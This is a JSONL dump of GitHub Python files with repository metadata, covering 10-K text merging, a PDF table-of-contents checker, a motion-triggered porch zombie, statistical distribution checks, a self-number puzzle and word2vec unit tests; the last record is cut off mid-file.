+{"seq_id":"36282156560","text":"from engine.main import Engine\nimport json\n\nengine = Engine()\n\nf_app = open('SecureWebContainer.json')\napplication = json.load(f_app)\n\nf_offers = open('offers_20.json')\noffers = json.load(f_offers)\n\nengine.solve(application, offers)\n","repo_name":"edilaitin/dissertation-aidc","sub_path":"engine/tests/testWrapper.py","file_name":"testWrapper.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16311483578","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 18 14:14:42 2022\n\n@author: leon\n\"\"\"\n\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\n\ndef load_ticker(load_path, file_name):\n \"\"\"\n Load ticker text file ticker.txt, return list of tickers.\n\n Parameters\n ----------\n load_path : str\n data path to load ticker text file\n\n Returns\n -------\n list\n\n \"\"\"\n read_full_path = os.path.join(load_path, file_name)\n with open(read_full_path, 'r') as f:\n lines = f.read()\n contents_split = lines.splitlines()\n \n return contents_split\n\ndef load_text(load_full_path):\n \"\"\"\n Load txt file from the given load_path\n\n Parameters\n ----------\n load_full_path : \n the full path to load the corresponding text file.\n Returns\n -------\n str\n\n \"\"\"\n text_file = open(load_full_path, \"r\")\n data = text_file.read()\n text_file.close()\n return data\n\ndef find_rf(ticker, rf_map, load_path = \"../text_data/10K_riskfactor\"):\n \"\"\"\n Find the risk factor files corresponding to the ticker. Return a dictionary\n containing the ticker, year and risk factor texts.\n\n Parameters\n ----------\n ticker : str\n a symbol representing a stock\n rf_map : pandas dataframe\n a dataframe with mapping between ticker, date, and risk factor file name.\n load_path: str\n the path to load risk factor related txt file.\n Returns\n -------\n dataframe\n\n \"\"\"\n time_ls = []\n rf_ls = []\n tk_ls = [ticker]\n \n cur_rf_map = rf_map[rf_map['firm'] == ticker]\n for i in range(len(cur_rf_map)):\n cur_file = cur_rf_map['filename'].iloc[i]\n cur_date = int(cur_rf_map['time'].iloc[i])\n load_full_path = os.path.join(load_path, cur_file)\n if os.path.isfile(load_full_path):\n cur_txt = load_text(load_full_path)\n rf_ls.append(cur_txt)\n time_ls.append(cur_date)\n else:\n print(\"There is no corresponding file. Continue.\")\n ls_len = len(time_ls)\n tk_ls = tk_ls * ls_len\n out_dict = {\"ticker\": tk_ls, \"time\": time_ls, \"risk_factor\": rf_ls}\n out_df = pd.DataFrame(out_dict)\n return out_df\n\ndef find_item1_7(ticker, item1_7_map, input_item, load_path):\n \"\"\"\n Find the item1 files corresponding to the ticker. Return a dictionary\n containing the ticker, year and item 1 or 7 texts.\n\n Parameters\n ----------\n ticker : str\n a symbol representing a stock\n item1_7_map : pandas dataframe\n a dataframe with mapping between ticker, date, and item1 and item7 file name\n input_item: str, \"1\" or \"7\"\n \"1\" represent we want item 1. \"7\" represent we want item 7.\n load_path : str\n the path to load item 1 related txt file.\n\n Returns\n -------\n dataframe\n\n \"\"\"\n time_ls = []\n item_ls = []\n tk_ls = [ticker]\n report_date_ls = []\n \n cur_item_map = item1_7_map[item1_7_map['firm'] == ticker]\n for i in range(len(cur_item_map)):\n if input_item == \"1\":\n cur_file = cur_item_map['filename'].iloc[i].split(\".\")[0] + \"_item1.txt\"\n elif input_item == \"7\":\n cur_file = cur_item_map['filename'].iloc[i].split(\".\")[0] + \"_item7.txt\"\n cur_date = cur_item_map['time'].iloc[i]\n cur_report_date = cur_item_map['report_date'].iloc[i]\n load_full_path = os.path.join(load_path, cur_file)\n if os.path.isfile(load_full_path):\n cur_txt = load_text(load_full_path)\n item_ls.append(cur_txt)\n time_ls.append(cur_date)\n report_date_ls.append(cur_report_date)\n \n else:\n print(f\"There is no corresponding file {cur_file}. Continue.\")\n ls_len = len(time_ls)\n tk_ls = tk_ls * ls_len\n if input_item == \"1\":\n out_dict = {\"ticker\": tk_ls, \"time\": time_ls, \"item1\": item_ls, \"10K_report_date\": report_date_ls}\n elif input_item == \"7\":\n out_dict = {\"ticker\": tk_ls, \"time\": time_ls, \"item7\": item_ls}\n out_df = pd.DataFrame(out_dict)\n return out_df \n\n\n \ndef merge_text(rf_df, item1_df, item7_df):\n \"\"\"\n input ticker, csv of risk factor, dictionary of item1,\n and dictionary of item7. Return a pandas dataframe containing\n date, ticker, risk factor text, MD&A text, business text\n\n Parameters\n ----------\n rf_df : dataframe\n dataframe of risk factor containing ticker, time, and risk_factor\n item1_df : dataframe\n dataframe of item1 containing ticker, time and item1.\n item7_df : dataframe\n dataframe of item7 containing ticker, time and item7.\n\n Returns\n -------\n pandas dataframe.\n\n \"\"\"\n \n temp_df1 = rf_df.merge(item1_df, on = 'time', how = 'inner')\n temp_df2 = temp_df1.merge(item7_df, on = 'time', how = 'inner')\n final_df = temp_df2.drop(['ticker_x', 'ticker_y'], axis = 1)\n return final_df\n\n\ndef call_merge(ticker_ls, rf_map, item1_7_map, rf_load_path,\n item1_load_path, item7_load_path, save_path,\n save_path2 = None):\n \"\"\"\n merge risk factor, item1, and item7 texts for all tickers in the\n ticker_ls. Save it to the save_path. We shall save a helper file\n in save_path2.\n\n Parameters\n ----------\n ticker_ls : TYPE\n DESCRIPTION.\n rf_map : TYPE\n DESCRIPTION.\n item1_7_map : TYPE\n DESCRIPTION.\n rf_load_path : TYPE\n DESCRIPTION.\n item1_load_path : TYPE\n DESCRIPTION.\n item7_load_path : TYPE\n DESCRIPTION.\n save_path : TYPE\n DESCRIPTION.\n save_path2 : TYPE, optional\n DESCRIPTION. The default is None.\n\n Returns\n -------\n None.\n\n \"\"\"\n out_dict = {}\n if not os.path.exists(save_path):\n os.makedirs(save_path)\n \n # If the save_path contains files, clearing them first.\n if len(os.listdir(save_path)) != 0:\n for f in os.listdir(save_path):\n os.remove(os.path.join(save_path, f))\n \n for i, tic in enumerate(ticker_ls):\n rf_df = find_rf(tic, rf_map)\n item1_df = find_item1_7(tic, item1_7_map, \"1\", item1_load_path)\n item7_df = find_item1_7(tic, item1_7_map, \"7\", item7_load_path)\n new_df = merge_text(rf_df, item1_df, item7_df)\n cur_len = len(new_df)\n \n # if the resulting file doesn't have item, skip\n if cur_len == 0:\n continue\n out_dict[tic] = cur_len\n save_file_name = tic + \"_text.csv\"\n save_full_path = os.path.join(save_path, save_file_name)\n new_df.to_csv(save_full_path, index = False)\n \n if save_path2:\n if not os.path.exists(save_path2):\n os.makedirs(save_path2)\n len_df = pd.DataFrame.from_dict(out_dict, orient = 'index')\n save_full_path2 = os.path.join(save_path2, \"ticker_num_years.csv\")\n len_df.to_csv(save_full_path2, index = False)\n \nif __name__ == \"__main__\":\n \n text_file = open(\"../text_data/10K_riskfactor/zyxi-0001144204-19-010229.txt\", 'r')\n data = text_file.read()\n text_file.close()\n print(data)\n \n \n # Create concise risk factor mapping\n rf = pd.read_csv(\"../text_data/risk_factors(title).csv\")\n unique_file = rf['filename'].unique()\n firm_ls = []\n for i in range(len(unique_file)):\n \n cur_index = rf.index[rf['filename'] == unique_file[i]][0]\n cur_firm = rf.iloc[cur_index]['firm']\n firm_ls.append(cur_firm)\n \n time_ls = []\n for i in range(len(unique_file)):\n cur_index = rf.index[rf['filename'] == unique_file[i]][0]\n cur_time = rf.iloc[cur_index]['time']\n time_ls.append(cur_time)\n new_rf = {\"filename\": list(unique_file), \"firm\": firm_ls, \"time\": time_ls}\n new_rf = pd.DataFrame(new_rf)\n \n new_rf.to_csv(\"../helper/ticker_rf_mapping.csv\")\n \n \n # Create concise business mapping\n item1_7_df = pd.read_csv(\"../text_data/ticker_item1_7_mapping.csv\", index_col = 0)\n item1_7_df = item1_7_df.dropna()\n con_item1_7 = item1_7_df[['filename', 'tic_in_comp', 'fdate', 'report_date']] \n \n con_item1_7.columns = ['filename', 'firm', 'time', 'report_date']\n con_item1_7['firm'] = con_item1_7['firm'].apply(lambda x: x.lower())\n con_item1_7['time'] = con_item1_7['time'].apply(lambda x: int(x.split(\"-\")[0]))\n con_item1_7.to_csv(\"../helper/ticker_item1_7_mapping.csv\") \n \n \n temp_file = con_item1_7['filename'].iloc[0]\n \n temp_file = temp_file.split(\".\") \n \n temp_item7 = temp_file[0] + \"_item7.txt\" \n \n temp_full_path = os.path.join(\"../text_data/item7MD&A\", temp_item7)\n \n os.path.isfile(temp_full_path)\n \n rf_map = pd.read_csv(\"../helper/ticker_rf_mapping.csv\", index_col = False)\n temp_rf = find_rf(\"a\", rf_map)\n \n item1_7_map = pd.read_csv(\"../helper/ticker_item1_7_mapping.csv\", index_col = False)\n temp_item1 = find_item1_7(\"a\", item1_7_map, \"1\", \"../text_data/item1business\")\n temp_item7 = find_item1_7(\"a\", item1_7_map, \"7\", \"../text_data/item7MD&A\")\n \n new1 = temp_rf.merge(temp_item1, on = 'time', how = 'inner')\n new2 = new1.merge(temp_item7, on = 'time', how = 'inner')\n new2.columns\n final_df = new2.drop(['ticker_x', 'ticker_y'], axis = 1)\n \n ticker_ls = load_ticker(\"../helper\", \"ticker_list.txt\")\n call_merge(ticker_ls, rf_map, item1_7_map, \"../text_data/10K_riskfactor\",\n \"../text_data/item1business\", \"../text_data/item7MD&A\", \"../stock_text\",\n \"../helper\")","repo_name":"Beast-Leon/Long-Term-Company-Growth-Prediction-using-NLP-Techniques-on-10-K-Financial-Filings","sub_path":"python code/data generation/process_text.py","file_name":"process_text.py","file_ext":"py","file_size_in_byte":9511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"34932720749","text":"import re\nfrom pdfparser.data_classes import Document, Line, Page\nfrom pdfparser.util import get_roman\n\ndef check_toc(document: Document):\n errors = []\n\n toc = document.toc\n\n for index, page in enumerate(toc):\n if page.lines[0].text.lower() != get_roman(page.pageid):\n errors.append(\"Table of content page \" + str(index) + \" should be enumarated with \" + get_roman(page.pageid) + \"!\")\n \n if toc[0].lines[1].text != \"TABLE OF CONTENTS\":\n errors.append(\"Table of contents section should start with header 'TABLE OF CONTENTS'!\")\n\n for index in range(1, len(toc)):\n toc[0].lines.extend(toc[index].lines[1:])\n\n is_two_line = False\n for index in range(2, len(toc[0].lines)):\n current_line: Line = toc[0].lines[index]\n\n if is_two_line:\n is_two_line = False\n continue\n\n if current_line.text[0].isdigit():\n if re.search(r\"(\\. )+[\\d]+$\", current_line.text) == None:\n if toc[0].lines[index+1].text[0].isdigit():\n print(toc[0].lines[index])\n errors.append(\"Misalignment in the points of line \" + current_line.text + \"!\")\n else: \n if re.search(r\"(\\. )+[\\d]+$\", toc[0].lines[index+1].text) == None:\n errors.append(\"Missing page number for line \" + current_line.text + \"!\")\n is_two_line = True\n else:\n if re.search(r\"[mdclxvi]+$\", current_line.text) == None and not (current_line.text.startswith(\"REFERENCES\") or current_line.text.startswith(\"APPENDIX\")):\n print(current_line)\n errors.append(\"Preliminary pages should be enumerated with roman numbers.\")\n\n return errors\n\n","repo_name":"burakcanyesil/Cmpe492-Format-Checker","sub_path":"pdfparser/checker/toc.py","file_name":"toc.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"41956273022","text":"#!/usr/bin/python3\n\nimport sys, time, random\nfrom servo_controls import *\nfrom sh import tail\n\ndef zombie_motion():\n motions = [no_dont_think_so]\n selected_motion = random.randint(0,len(motions))\n try: \n motions[selected_motion]()\n except Exception as e:\n print(\"Error: unable to do random motion\")\n print(\" Exception: {0}\".format(e))\n return True\n\ndef main():\n # log file\n motion_log = \"/var/log/motion/motion.log\"\n\n # counter for random motions\n seconds = 0\n\n for line in tail(\"-f\", motion_log, _iter=True): \n if \"motion_detected\" in line: \n lrap() \n time.sleep(5) \n blrap()\n time.sleep(30)\n\n # do a check and if rights chance do some creepy moves :-)\n if seconds == 10:\n if random.randint(0,9) == 1:\n zombie_motion()\n seconds = 0\n else:\n seconds += 1\n\n time.sleep(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"markcitron/porch_zombie","sub_path":"2020/not_using/waiting_zombie.py","file_name":"waiting_zombie.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"21502220497","text":"import pandas as pd\nfrom scipy import stats\nfrom typing import Tuple\n\n\ndef is_significant(p_value: float, alpha: float = 0.05) -> bool:\n \"\"\"\n Check if the statistical test result is significant.\n\n Args:\n p_value (float):\n The p-value of the statistical test\n alpha (float, optional):\n The alpha level to compare the p-value to, defaults to 0.05.\n\n Returns:\n bool:\n True if the p-value is less than or equal to alpha, False otherwise\n \"\"\"\n return p_value <= alpha\n\n\ndef check_distribution(column: pd.Series, alpha: float = 0.05) -> str:\n # Use stats.kstest() for uniform, shapiro_wilk for normal\n mean = column.mean()\n std = column.std()\n size = column.size\n\n # Normality Test\n shapiro_significant = is_significant(stats.shapiro(column).pvalue, alpha)\n normality = \"not normal\" if shapiro_significant else \"normal\"\n\n # Uniformity Test\n uniform = stats.uniform.rvs(loc=mean, scale=std, size=size, random_state=1)\n ks_significant = is_significant(stats.kstest(rvs=column, cdf=uniform).pvalue, alpha)\n uniformity = \"not uniform\" if ks_significant else \"uniform\"\n\n return f\"{normality}, {uniformity}\"\n","repo_name":"jjz17/geeda","sub_path":"src/geeda/column/check_distribution.py","file_name":"check_distribution.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11682711683","text":"def selfn(a):\n answer = a\n arr = list(map(int, list(str(a))))\n answer += sum(arr)\n return answer\n\n\nvisited = [0]*10000\nfor i in range(1, 10000):\n s = selfn(i)\n if s < 10000:\n visited[selfn(i)] = 1\nfor idx, v in enumerate(visited):\n if idx == 0:\n continue\n if not v:\n print(idx)\n","repo_name":"ohtjqkd/algorithm","sub_path":"baekjoon/4673.py","file_name":"4673.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8401153848","text":"import math\nimport os\nimport sys\nfrom typing import List\n\nimport numpy as np\n\nimport pytest\nfrom pytest import fail\n\n# https://numba.readthedocs.io/en/stable/cuda/simulator.html\nos.environ[\"NUMBA_ENABLE_CUDASIM\"] = \"1\"\nfrom numba import cuda\nfrom numba.cuda import random as c_random\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../')))\nfrom myw2v.myw2v import BLANK_TOKEN\nfrom myw2v import myw2v\n\ntest_data_path = os.path.join(os.path.dirname(__file__), \"data\")\n\n\ndef test_build_vocab():\n vocab = myw2v.build_vocab(test_data_path)\n pleasures, total, sentences = list(filter(lambda t: t[0] == \"pleasures\", vocab))[0]\n # cat 0* | fgrep -c -i pleasures # 2\n # cat 0* | perl -pe 's/ /\\n/g' | fgrep -c -i pleasures # 3\n assert total == 3\n assert sentences == 2\n\n\ndef test_sort_vocab():\n orig = [(\"foo\", 1, 2), (\"bar\", 55, 2), (\"asdf\", 3, 3), (\"another_word\", 4, 1)]\n exp = [(BLANK_TOKEN, 0, 0), (\"bar\", 55, 2), (\"another_word\", 4, 1), (\"asdf\", 3, 3), (\"foo\", 1, 2)]\n assert exp == myw2v.sort_vocab(orig)\n\n\ndef test_prune_vocab():\n orig = [(\"foo\", 1, 2), (\"bar\", 55, 2), (\"asdf\", 3, 3), (\"another_word\", 4, 1)]\n result1 = myw2v.prune_vocab(min_occrs=1, my_vocab=orig)\n assert result1 == [(word, total) for word, total, _ in orig]\n result2 = myw2v.prune_vocab(min_occrs=2, my_vocab=orig)\n assert result2 == [(\"foo\", 1), (\"bar\", 55), (\"asdf\", 3)]\n\n\ndef test_bias_freq_counts():\n def assert_words_and_close_enough_freqs(act, exp):\n assert [word for word, _ in act] == [word for word, _ in exp]\n for i in range(0, len(exp)):\n _, fact = act[i]\n _, fexp = exp[i]\n assert close_enough(fact, fexp), f\"At index {i} actual was {fact}, expected {fexp}\"\n words = [BLANK_TOKEN, \"pie\", \"apple\", \"mince\", \"beef\", \"delicious\"]\n freqs = [0, 3, 2, 2, 1, 1]\n vocab = list(zip(words, freqs))\n freqs_basic = list(zip(words, [0, 3/9, 2/9, 2/9, 1/9, 1/9]))\n result1 = myw2v.bias_freq_counts(vocab, exponent=1.0)\n print(result1)\n assert_words_and_close_enough_freqs(result1, freqs_basic)\n result2 = myw2v.bias_freq_counts(vocab, exponent=0.75)\n print(result2)\n q2 = [math.pow(q, 0.75) for q in freqs]\n assert_words_and_close_enough_freqs(result2, list(zip(words, [f/sum(q2) for f in q2])))\n result3 = myw2v.bias_freq_counts(vocab, exponent=0.444)\n print(result3)\n q3 = [math.pow(q, 0.444) for q in freqs]\n assert_words_and_close_enough_freqs(result3, list(zip(words, [f/sum(q3) for f in q3])))\n\n\ndef test_calc_subsampling_weights():\n vocab = [('pie', 3), ('apple', 2), ('mince', 2), ('beef', 1), ('delicious', 1)]\n s = sum([c for _, c in vocab])\n freqs = [c/s for _, c in vocab]\n\n t1 = 1e-5\n expected1 = [1-math.sqrt(t1/freq) for freq in freqs]\n weights1, _ = myw2v.get_subsampling_weights_and_negative_sampling_array(vocab, t=t1)\n print(f\"EXPECTED 1: {expected1}\")\n print(f\"WEIGHTS 1: {weights1}\")\n assert_all_close_enough(weights1, expected1)\n\n t2 = 1e-5\n f = 500000\n vocab2 = [(\"pie\", f), (\"apple\", 1)]\n expected2_ = [1-math.sqrt(t2/freq) for freq in [f/(f+1), 1/(f+1)]]\n # when freq < t, might go negative, check that we guard against that\n expected2 = [q if q >= 0 else 0 for q in expected2_]\n weights2, _ = myw2v.get_subsampling_weights_and_negative_sampling_array(vocab2, t=t2)\n print(f\"EXPECTED 2: {expected2}\")\n print(f\"WEIGHTS 2: {weights2}\")\n assert_all_close_enough(weights2, expected2)\n\n\ndef test_weight_init():\n vocab_size = 12345\n for seed in 1234, 12345, 123456, 999:\n for emb_dim in [1, 10, 100]:\n # numpy, no cuda, btw\n w1, w2 = myw2v.init_weight_matrices(vocab_size, emb_dim, seed=seed)\n assert_weights(w1, w2, emb_dim)\n\n\ndef test_step():\n # if the test data is all roughly the same magnitude, then the learning will proceed as expected -\n # if one or two of these vectors is say 0.01 or something, then one or more gradients will get inverted.\n # this is fine of course, but in a unit test it can be a bit awkward heh\n emb = np.array([\n [0, 0],\n [-0.1, 0.1],\n [0.1, -0.1],\n [0.2, 0.4],\n [-0.3, -0.2]\n ], dtype=np.float32)\n emb2 = np.array([\n [0, 0],\n [0.2, -0.5],\n [-0.2, 0.3],\n [0.1, 0.7],\n [-0.4, 0.1]\n ], dtype=np.float32)\n emb_dim = emb.shape[1] # 3 vectors of dim 2 each, so this is 2\n k = 2\n thread_idx = 0\n vocab_size = emb.shape[0]\n neg_smpl_arr = [1, 1, 1, 1, 2, 2]\n # with this seed the first rnd will be 0.26615933 which ^ results in 1 from this arr\n # second: 0.81275994 -> 2\n q_expected = [1, 2]\n x = 3\n y = 4\n lr = 0.2\n calc_aux = cuda.to_device(np.zeros((vocab_size, emb_dim), dtype=np.float32))\n random_states_init_cuda = c_random.create_xoroshiro128p_states(vocab_size, seed=12345)\n neg_smpl_arr_cuda = cuda.to_device(neg_smpl_arr)\n\n w1 = cuda.to_device(emb)\n w2 = cuda.to_device(emb2)\n print(f\"Initial: w1, shape {w1.shape}:\\n{w1}\")\n print(f\"Initial: w2, shape {w2.shape}:\\n{w2}\")\n\n # thread_idx, w1, w2, calc_aux, x, y, k, learning_rate, negsample_array, random_states # btw\n myw2v.step(thread_idx, w1, w2, calc_aux, x, y, k, lr, neg_smpl_arr_cuda, random_states_init_cuda)\n w1 = w1.copy_to_host()\n w2 = w2.copy_to_host()\n ca = calc_aux.copy_to_host()\n print(f\"Then: ca, shape {ca.shape}:\\n{ca}\")\n\n dot_pos = np.dot(emb[x,], emb2[y,])\n dot_neg_1 = np.dot(emb[x,], emb2[q_expected[0],])\n dot_neg_2 = np.dot(emb[x,], emb2[q_expected[1],])\n s_xdq_1 = 1./(1. + math.exp(-dot_neg_1))\n s_xdq_2 = 1./(1. + math.exp(-dot_neg_2))\n print(f\"x, y {emb[x,]} {emb2[y,]}, dot(x,y) = {dot_pos}\")\n print(f\"x, q {emb[x,]} {emb2[q_expected,]}, dot(x,q1) = {dot_neg_1}, dot(x,q2) = {dot_neg_2}\")\n print(f\"sigmoid(x dot q1) = {s_xdq_1}, -''- q2 = {s_xdq_2}\")\n print(f\"q orig = {emb2[q_expected,]}\")\n print(f\"q1 * sigmoid(x dot q1) = {emb2[q_expected[0],] * s_xdq_1}\")\n print(f\"q2 * sigmoid(x dot q2) = {emb2[q_expected[1],] * s_xdq_2}\")\n neg_samples_contrib_x = emb2[q_expected[0],] * s_xdq_1 + emb2[q_expected[1],] * s_xdq_2\n pos_sample_contrib_x = (1./(1. + math.exp(-np.dot(emb[x,], emb2[y,]))) - 1) * emb2[y,]\n gradient_x = neg_samples_contrib_x+pos_sample_contrib_x\n gradient_y = (1./(1. + math.exp(-np.dot(emb[x,], emb2[y,]))) - 1) * emb[x,]\n gradient_q1 = s_xdq_1 * emb[x,]\n gradient_q2 = s_xdq_2 * emb[x,]\n print(f\"neg_samples_contrib_x: {neg_samples_contrib_x}\")\n print(f\"pos_sample_contrib_x: {pos_sample_contrib_x}\")\n print(f\"GRADIENT, x: {gradient_x}\")\n print(f\"GRADIENT, y: {gradient_y}\")\n print(f\"GRADIENT, q1: {gradient_q1}\")\n print(f\"GRADIENT, q2: {gradient_q2}\")\n print(f\"x dot y, orig {np.dot(emb[x,], emb2[y,])} -> now {np.dot(w1[x,], w2[y,])}\")\n print(f\"x dot q1, orig {np.dot(emb[x,], emb2[q_expected[0],])} -> now {np.dot(w1[x,], w2[q_expected[0],])}\")\n print(f\"x dot q2, orig {np.dot(emb[x,], emb2[q_expected[1],])} -> now {np.dot(w1[x,], w2[q_expected[1],])}\")\n print(f\"x orig {emb[x,]} -> now {w1[x,]}: adjustment of {w1[x,]-emb[x,]} vs. lr*gradient {-lr*gradient_x}\")\n print(f\"y orig {emb2[y,]} -> now {w2[y,]}: adjustment of {w2[y,]-emb2[y,]} vs. lr*gradient {-lr*gradient_y}\")\n print(f\"q1 orig {emb2[q_expected[0],]} -> now {w2[q_expected[0],]}: adjustment of {w2[q_expected[0],]-emb2[q_expected[0],]} vs. lr*gradient {-lr*gradient_q1}\")\n print(f\"q2 orig {emb2[q_expected[1],]} -> now {w2[q_expected[1],]}: adjustment of {w2[q_expected[1],]-emb2[q_expected[1],]} vs. lr*gradient {-lr*gradient_q2}\")\n assert close_enough_(w1[x,]-emb[x,], -lr*gradient_x, 1e-5)\n assert close_enough_(w2[q_expected[0],]-emb2[q_expected[0],], -lr*gradient_q1, 1e-5)\n assert close_enough_(w2[q_expected[1],]-emb2[q_expected[1],], -lr*gradient_q2, 1e-5)\n assert np.dot(w1[x,], w2[y,]) > np.dot(emb[x,], emb2[y,])\n assert np.dot(w1[x,], w2[q_expected[0],]) < np.dot(emb[x,], emb2[q_expected[0],])\n assert np.dot(w1[x,], w2[q_expected[1],]) < np.dot(emb[x,], emb2[q_expected[1],])\n\n\ndef test_word2vec():\n # if the test data is all roughly the same magnitude, then the learning will proceed as expected -\n # if one or two of these vectors is say 0.01 or something, then one or more gradients will get inverted.\n # this is fine of course, but in a unit test it can be a bit awkward heh\n emb = np.array([\n [0, 0],\n [-0.1, 0.1],\n [0.1, -0.1],\n [0.2, 0.4],\n [-0.3, -0.2]\n ], dtype=np.float32)\n emb2 = np.array([\n [0, 0],\n [0.2, -0.5],\n [-0.2, 0.6],\n [0.1, 0.7],\n [-0.4, 0.1]\n ], dtype=np.float32)\n # no i don't necessarily trust myself with generating \"random\" test data why do you ask\n for i in range(1, emb.shape[0]):\n for j in range(1, emb.shape[0]):\n dot = float(np.dot(emb[i,], emb2[j,]))\n if close_enough(dot, 0, 1e-6):\n fail(f'Expecting test data to be \"naturally non-zeroing\" but got zero dot for emb[{i},] emb2[{j},] = {emb[i,]}, {emb2[j,]}')\n\n vocab_size = emb.shape[0]\n emb_dim = emb.shape[1]\n c = 1\n k = 1\n lr = 0.1\n threads_per_block = 16\n a, b = 3, 4\n subs_weights = [0.0, 0.6, 0.2, 0.15, 0.1]\n # TODO NOTE: depending on random seed & how many rng calls are made, the following could cause this test to fail:\n # TODO NOTE: see \"aux_out\" stuff for how to \"debug\" where the randoms fall on each run...\n neg_smpl_arr = [1, 1, 1, 1, 1, 1, 2, 2, 2, 2]\n q1, q2 = 2, 1\n inp = [a, b]\n rows = 1\n blocks: int = math.ceil(rows / threads_per_block)\n random_states_init_cuda = c_random.create_xoroshiro128p_states(vocab_size, seed=12345)\n w1 = cuda.to_device(emb)\n w2 = cuda.to_device(emb2)\n\n calc_aux = cuda.to_device(np.zeros((len(inp), emb_dim), dtype=np.float32))\n aux_out = cuda.to_device(np.zeros((threads_per_block, 2), dtype=np.float32))\n myw2v.calc[blocks, threads_per_block](rows, c, k, lr, w1, w2, calc_aux, random_states_init_cuda,\n cuda.to_device(subs_weights), cuda.to_device(neg_smpl_arr),\n cuda.to_device(inp), cuda.to_device([0]), cuda.to_device([2]))#,\n# aux_out)\n w1 = w1.copy_to_host()\n w2 = w2.copy_to_host()\n calc_aux = calc_aux.copy_to_host()\n print(f\"After: w1, shape {w1.shape}:\\n{w1}\")\n print(f\"After: w2, shape {w2.shape}:\\n{w2}\")\n print(f\"After: calc_aux, shape {calc_aux.shape}:\\n{calc_aux}\")\n print(f\"After: aux_out, shape {aux_out.shape}:\\n{aux_out}\")\n\n # DATA [3, 4] & q [1, 2] ->\n # 3 -> 4, q = 1: adjust w1[3]; adjust w2[4]; adjust w2[1]\n # 4 -> 3, q = 2: adjust w1[4]; adjust w2[3]; adjust w2[2]\n\n gradient_a1, gradient_b1, gradient_q1 = calc_contrib(emb, emb2, a, b, q1)\n print(f\"GRADIENT x={a} #1: {gradient_a1}\")\n print(f\"GRADIENT y={b} #1: {gradient_b1}\")\n print(f\"GRADIENT q={q1} #1: {gradient_q1}\")\n gradient_b2, gradient_a2, gradient_q2 = calc_contrib(emb, emb2, b, a, q2)\n print(f\"GRADIENT x={b} #2: {gradient_b2}\")\n print(f\"GRADIENT y={a} #2: {gradient_a2}\")\n print(f\"GRADIENT q={q2} #2: {gradient_q2}\")\n\n print(f\"{a} dot {b}, orig {np.dot(emb[a,], emb2[b,])} -> now {np.dot(w1[a,], w2[b,])}\")\n print(f\"{a} dot {q1}, orig {np.dot(emb[a,], emb2[q1,])} -> now {np.dot(w1[a,], w2[q1,])}\")\n print(f\"{b} dot {q2}, orig {np.dot(emb[b,], emb2[q2,])} -> now {np.dot(w1[b,], w2[q2,])}\")\n print(f\"{a} #1 orig {emb[a,]} -> now {w1[a,]}: adjustment of {w1[a,] - emb[a,]} vs. lr*gradient {-lr * gradient_a1}\")\n print(f\"{b} #2 orig {emb2[b,]} -> now {w2[b,]}: adjustment of {w2[b,] - emb2[b,]} vs. lr*gradient {-lr * gradient_b1}\")\n print(f\"{b} #1 orig {emb[b,]} -> now {w1[b,]}: adjustment of {w1[b,] - emb[b,]} vs. lr*gradient {-lr * gradient_b2}\")\n print(f\"{a} #2 orig {emb2[a,]} -> now {w2[a,]}: adjustment of {w2[a,] - emb2[a,]} vs. lr*gradient {-lr * gradient_a2}\")\n print(f\"{q1} orig {emb2[q1,]} -> now {w2[q1,]}: adjustment of {w2[q1,] - emb2[q1,]} vs. lr*gradient {-lr * gradient_q1}\")\n print(f\"{q2} orig {emb2[q2,]} -> now {w2[q2,]}: adjustment of {w2[q2,] - emb2[q2,]} vs. lr*gradient {-lr * gradient_q2}\")\n assert close_enough_(w1[a,] - emb[a,], -lr * gradient_a1, 1e-5)\n assert close_enough_(w2[q1,] - emb2[q1,], -lr * gradient_q1, 1e-5)\n assert close_enough_(w2[q2,] - emb2[q2,], -lr * gradient_q2, 1e-5)\n assert np.dot(w1[a,], w2[b,]) > np.dot(emb[a,], emb2[b,])\n assert np.dot(w1[a,], w2[q1,]) < np.dot(emb[a,], emb2[q1,])\n assert np.dot(w1[b,], w2[q2,]) < np.dot(emb[b,], emb2[q2,])\n\n\ndef calc_contrib(emb, emb2, inp, outp, q1):#, q2):\n dot_pos = np.dot(emb[inp,], emb2[outp,])\n dot_neg_1 = np.dot(emb[inp,], emb2[q1,])\n s_xdq_1 = 1. / (1. + math.exp(-dot_neg_1))\n neg_samples_contrib_x = emb2[q1,] * s_xdq_1\n pos_sample_contrib_x = (1. / (1. + math.exp(-dot_pos)) - 1) * emb2[outp,]\n gradient_x = neg_samples_contrib_x + pos_sample_contrib_x\n gradient_y = (1. / (1. + math.exp(-dot_pos)) - 1) * emb[inp,]\n gradient_q1 = s_xdq_1 * emb[inp,]\n return gradient_x, gradient_y, gradient_q1\n\n\ndef get_file_contents(path) -> List[str]:\n with open(path, \"r\") as f:\n l = f.readlines()\n l2 = [line.strip() for line in l]\n l3 = [line for line in l2 if line]\n return l3\n\n\ndef close_enough(x: float, tgt: float, tol: float = 1e-6) -> bool:\n return abs(x-tgt) <= tol\n\n\ndef assert_all_close_enough(act, exp):\n for i in range(0, len(exp)):\n fact = act[i]\n fexp = exp[i]\n assert close_enough(fact, fexp), f\"At index {i} actual was {fact}, expected {fexp}\"\n\n\ndef close_enough_(x: np.ndarray, tgt: np.ndarray, tol: float) -> bool:\n return (abs(x-tgt) <= tol).all()\n\n\ndef assert_weights(w1, w2, emb_dim):\n muw1 = float(np.mean(w1[1:, :]))\n muw2 = float(np.mean(w2[1:, :]))\n varw1 = float(np.var(w1[1:, :]))\n varw2 = float(np.var(w2[1:, :]))\n print(f\"Mean w1 {muw1} w2 